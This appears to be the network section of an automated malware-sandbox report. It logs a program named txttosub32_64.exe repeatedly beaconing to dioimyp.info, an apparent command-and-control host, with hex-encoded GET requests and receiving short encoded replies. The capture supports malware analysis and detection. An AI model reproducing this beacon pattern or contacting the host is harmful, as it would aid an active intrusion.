                                                                                Oct 8, 2024 22:39:05.898669004 CEST744INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:05 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 32 31 38 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 37 38 63 64 32 65 64 31 63 30 31 65 61 61 32 35 35 66 34 30 32 64 31 66 61 38 31 65 63 39 34 38 37 34 64 38 62 34 66 64 32 66 62 64 66 33 37 33 36 62 39 34 65 66 65 64 31 64 61 31 38 32 38 65 31 37 64 35 61 61 64 37 35 66 36 36 63 61 38 33 37 35 33 64 65 66 62 64 61 31 36 63 32 34 30 63 65 36 33 62 31 31 30 66 63 33 39 38 62 32 36 65 34 31 30 61 64 36 32 63 30 34 64 62 63 65 35 35 30 65 62 35 64 36 31 34 31 65 66 32 63 36 64 39 36 33 62 36 37 38 65 66 34 31 33 63 37 66 31 39 33 39 65 32 35 63 63 36 64 39 33 30 38 64 66 35 39 38 35 32 62 62 36 35 39 62 33 65 32 35 37 32 33 66 33 37 39 64 32 66 66 36 37 62 38 38 39 65 65 63 62 34 62 65 32 33 62 63 33 31 33 33 35 35 64 35 61 32 62 65 32 32 32 37 61 31 36 36 34 62 39 66 32 38 39 66 65 39 38 32 63 35 31 65 65 35 36 37 65 32 31 66 65 32 31 35 63 66 32 66 38 66 39 38 64 66 63 32 30 37 61 61 30 65 34 35 39 39 30 38 63 66 31 37 65 32 37 31 [TRUNCATED]
                                                                                Data Ascii: 21867b69c953804b26b565fe95b321bd19a55f78cd2ed1c01eaa255f402d1fa81ec94874d8b4fd2fbdf3736b94efed1da1828e17d5aad75f66ca83753defbda16c240ce63b110fc398b26e410ad62c04dbce550eb5d6141ef2c6d963b678ef413c7f1939e25cc6d9308df59852bb659b3e25723f379d2ff67b889eecb4be23bc313355d5a2be2227a1664b9f289fe982c51ee567e21fe215cf2f8f98dfc207aa0e459908cf17e2713bd63ee91c9ac64d1621b29346db256c6d9a73d2ebac905b909bbbc33b8ccd531712310d133ea19ead1be0744db3b0dc550d3ed61992ba99759aae8d5a8c03020bf66bfec0e85a1b97444a285f22baefe858614ec1ce74481486dd1b3c2e3d14064a199ee0a0
                                                                                Oct 8, 2024 22:39:06.011699915 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:06.296370983 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:06 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.449789185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:06.425005913 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:07.154376984 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:07 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.449795185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:07.287647009 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:08.037844896 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:07 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.449801185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:08.157028913 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:08.886323929 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:08 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:08.996186972 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:09.275167942 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:09.386993885 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:09.632167101 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.449812185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:09.753551960 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:10.468666077 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:10 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.449817185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:10.842780113 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:11.592855930 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:11 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.449825185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:11.721782923 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:12.418421984 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:12 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.449830185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:12.534420967 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:13.357973099 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:13 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.449837185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:13.485261917 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:14.294398069 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:14 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.449841185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:14.425038099 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:15.144432068 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:15 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.449848185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:15.267816067 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:16.031441927 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:15 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.449854185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:16.157192945 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:16.878444910 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:16 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.449861185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:17.000997066 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:17.772537947 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:17 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.2.449869185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:17.891968966 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:18.588651896 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:18 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.449875185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:18.901643038 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:19.683840990 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:19 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:19.792102098 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:20.037206888 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:19 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.2.449884185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:20.156887054 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:20.864322901 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:20 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.2.449891185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:20.984997988 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:21.901221991 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:21 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:21.903377056 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:21 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:22.010966063 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:22.278448105 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:22 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                18192.168.2.449898185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:22.406500101 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:23.668678999 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:23 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:23.669034004 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:23 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
